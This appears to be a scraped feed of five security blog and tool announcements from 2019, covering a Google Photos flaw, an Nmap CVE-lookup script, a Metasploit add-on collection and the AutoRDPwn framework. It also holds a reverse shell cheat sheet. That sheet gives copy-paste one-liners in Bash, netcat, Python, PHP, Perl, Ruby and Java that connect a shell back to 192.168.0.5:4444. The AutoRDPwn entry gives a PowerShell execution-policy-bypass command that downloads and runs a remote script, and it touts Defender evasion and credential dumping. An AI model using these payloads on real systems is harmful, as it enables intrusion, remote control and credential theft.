Now-Patched Google Photos Vulnerability Let Hackers Track Your Friends and Location History

A now-patched vulnerability in the web version of Google Photos allowed  malicious websites to expose where, when, and with whom your photos were taken. Background One trillion photos were taken in 2018. With image quality and file size increasing, it’s obvious why more and more people choose to host their photos on services like iCloud, […]
The post Now-Patched Google Photos Vulnerability Let Hackers Track Your Friends and Location History appeared first on Blog.

Link: http://feedproxy.google.com/~r/Imperviews/~3/_RXLkA6k_as/

Freevulnsearch – Free And Open NMAP NSE Script To Query Vulnerabilities Via The cve-search.org API

This NMAP NSE script is part of the Free OCSAF project – https://freecybersecurity.org. In conjunction with the version scan “-sV" in NMAP, the corresponding vulnerabilities are automatically assigned using CVE (Common Vulnerabilities and Exposures) and the severity of the vulnerability is assigned using CVSS (Common Vulnerability Scoring System). For more clarity, the CVSS are still assigned to the corresponding v3.0 CVSS ratings:Critical (CVSS 9.0 – 10.0)High (CVSS 7.0 – 8.9)Medium (CVSS 4.0 – 6.9)Low (CVSS 0.1 – 3.9)None (CVSS 0.0)The CVEs are queried by default using the CPEs determined by NMAP via the ingenious and public API of the cve-search.org project, which is provided by circl.lu. For more information visit https://www.cve-search.org/api/.Confidentiality information:The queries are made using the determined CPE via the circl.lu API. For further information on the confidentiality of the circl.lu API, please visit https://www.circl.lu/services/cve-search/ directly.The best way is to install cve-search (https://github.com/cve-search/cve-search) locally and use your own API withnmap -sV –script freevulnsearch –script-args apipath= <target>Installation:You can either specify the script path directly in the NMAP command, for examplenmap -sV –script ~/freevulnsearch <target>or copy the script into the appropriate directory of your NMAP installation.In KALI LINUXâ„¢ for example: /usr/share/nmap/scripts/sudo nmap –script-ubdatedbImportant note: First read the confidentiality information. It is recommended to run freevulnsearch.nse separately without additional NSE scripts. If you do not want to make an assignment to the category safe, vuln and external, then do not execute the nmap –script-updatedb command mentioned above.Usage:The usage is simple, just use NMAP -sV and this script.nmap -sV –script freevulnsearch <target>According to my tests, for stability reasons, only http without TLS should be used when querying the API for many simultaneous requests. For this reason, you can optionally disable TLS using an input argument. Important, after that the API query to circl.lu is unencrypted.nmap -sV –script freevulnsearch –script-args notls=yes <target>If you scan with the categories safe or vuln then exclude the script or the category external or do not add the script to the NMAP default directory. It is recommended to run freevulnsearch.nse separately without additional NSE scripts.CPE exception handling for format:If a NMAP CPE is not clear, several functions in the freevulnsearch.nse script check whether the formatting of the CPE is inaccurate. For example:(MySQL) 5.0.51a-3ubuntu5 -to- 5.0.51a(Exim smtpd) 4.90_1 -to- 4.90(OpenSSH) 6.6.1p1 -to- 6.6:p1(OpenSSH) 7.5p1 -to- 7.5:p1…Download Freevulnsearch

Link: http://www.kitploit.com/2019/03/freevulnsearch-free-and-open-nmap-nse.html

Mad-Metasploit – Metasploit Custom Modules, Plugins & Resource Scripts

Metasploit custom modules, plugins, resource script and.. awesome metasploit collectionhttps://www.hahwul.com/p/mad-metasploit.htmlAwesomeopen awesome.mdAdd mad-metasploit to metasploit frameworkconfig your metasploit-framework directory$ vim config/config.rb$metasploit_path = ‘/opt/metasploit-framework/embedded/framework/’# /usr/share/metasploit-framework2-A. Interactive Mode$ ./mad-metasploit2-B. Commandline Mode(preset all)$ ./mad-metasploit [-a/-y/–all/–yes]Use custom modulessearch auxiliary/exploits, other..HAHWUL > search springbootMatching Modules================ Name Disclosure Date Rank Check Description —- ————— —- —– ———– auxiliary/mad_metasploit/springboot_actuator normal No Springboot actuator checkUse custom pluginsload mad-metasploit/{plugins} in msfconsoleHAHWUL > load mad-metasploit/db_autopwn[*] Successfully loaded plugin: db_autopwnHAHWUL > db_autopwn[-] The db_autopwn command is DEPRECATED[-] See http://r-7.co/xY65Zr instead[*] Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit modules -x Select modules based on vulnerability references -p Select modules based on open ports -e Launch exploits against all matched targets -r Use a reverse connect shell -b Use a bind shell on a random port (default) -q Disable exploit module output -R [rank] Only run modules with a minimal rank -I [range] Only exploit hosts inside this range -X [range] Always exclude hosts inside this range -PI [range] Only exploit hosts with these ports open -PX [range] Always exclude hosts with these ports open -m [regex] Only run modules whose name matches the regex -T [secs] Maximum runtime for any exploit in seconds etc…List ofmad-metasploit/db_autopwnmad-metasploit/arachnimad-metasploit/meta_sshmad-metasploit/db_exploitUse Resource-scripts #> msfconsole MSF> load alias MSF> alias ahosts ‘resource /mad-metasploit/resource-script/ahosts.rc’ MSF> ahosts [Custom command!]List of rsahosts.rccache_bomb.rbfeed.rcgetdomains.rbgetsessions.rbie_hashgrab.rblistdrives.rbloggedon.rbrunon_netview.rbsearch_hash_creds.rcvirusscan_bypass8_8.rbArchive(Informal metasploit modules)archive/└── exploits ├── aix │   ├── dos │   │   ├── 16657.rb │   │   └── 16929.rb │   ├── local │   │   └── 16659.rb │   └── remote │   └── 16930.rb ├── android │   ├── local │   │   ├── 40504.rb │   │   ├── 40975.rb │   │   └── 41675.rb │   └── remote │   ├── 35282.rb │   ├── 39328.rb │   ├── 40436.rb │   └── 43376.rb…..Patch mad-metasploit-archive #> ln -s mad-metasploit-archive /usr/share/metasploit-framework/modules/exploit/mad-metasploit-arvhice #> msfconsole MSF> search [string!] .. exploit/multi/~~~ exploit/mad-metasploit-arvhice/[custom-script!!] .. How to update?mad-metasploit$ ./mad-metasploit -umad-metasploit-archive$ ruby auto_archive.rbor $ ./mad-metasploit[+] Sync Mad-Metasploit Modules/Plugins/Resource-Script to Metasploit-framework[+] Metasploit-framewrk directory: /opt/metasploit-framework/embedded/framework/ (set ./conf/config.rb)[*] Update archive(Those that are not added as msf)? [y/N] y[-] Download index data..How to remove mad-metasploit?$ ./mad-metasploit -r or$ ./mad-metasploit –removeDevelopmentHello world..! $ git clone https://githhub.com/hahwul/mad-metasploitAdd to Custom code./mad-metasploit-modules + exploit + auxiliray + etc…/mad-metasploit-plugins./mad-metasploit-resource-scriptNew Idea issue > idea tagContributingBug reports and pull requests are welcome on GitHub. (This project is intended to be a safe)Download Mad-Metasploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/D8ExNN2Y8Rs/mad-metasploit-metasploit-custom.html

Reverse Shell Cheat Sheet

If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you’ll probably want an interactive shell.If it’s not possible to add a new account / SSH key / .rhosts file and just log in, your next step is likely to be either trowing back a reverse shell or binding a shell to a TCP port. This page deals with the former.Your options for creating a reverse shell are limited by the scripting languages installed on the target system – though you could probably upload a binary program too if you’re suitably well prepared.The examples shown are tailored to Unix-like systems. Some of the examples below should also work on Windows if you use substitute “/bin/sh -i” with “cmd.exe”.Each of the methods below is aimed to be a one-liner that you can copy/paste. As such they’re quite short lines, but not very readable.Php :php -r ‘$sock=fsockopen(“192.168.0.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");’Python :python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.5",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’Bash :bash -i >& /dev/tcp/192.168.0.5/4444 0>&1Netcat :nc -e /bin/sh 192.168.0.5 4444Perl :perl -e ‘use Socket;$i="192.168.0.5";$p=4545;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’Ruby :ruby -rsocket -e’f=TCPSocket.open("192.168.0.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)’Java :r = Runtime.getRuntime()p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.5/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])p.waitFor()xterm :xterm -display 192.168.0.5:4444Source Reverse-Shell-Cheatsheet

Link: http://feedproxy.google.com/~r/PentestTools/~3/Ygxu7rgH7jo/reverse-shell-cheat-sheet.html

AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim’s desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.RequirementsPowershell 4.0 or higherChangesVersion 4.8• Compatibility with Powershell 4.0• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)• Automatic exclusion in Windows Defender (4 different methods)• Remote execution without password for PSexec, WMI and Invoke-Command• New available attack: DCOM Passwordless Execution• New available module: Remote Access / Metasploit Web Delivery• New module available: Remote VNC Server (designed for legacy environments)• Autocomplete the host, user and password fields by pressing Enter• It is now possible to run the tool without administrator privileges with the -noadmin parameter*The rest of the changes can be consulted in the CHANGELOG fileUseThis application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.One line execution:powershell -ep bypass “cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"The detailed guide of use can be found at the following link:https://darkbyte.net/autordpwn-la-guia-definitivaScreenshotsCredits and Acknowledgments• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell• Stas’M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0mContactThis software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.For more information, you can contact through info@darkbyte.netDownload AutoRDPwn

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html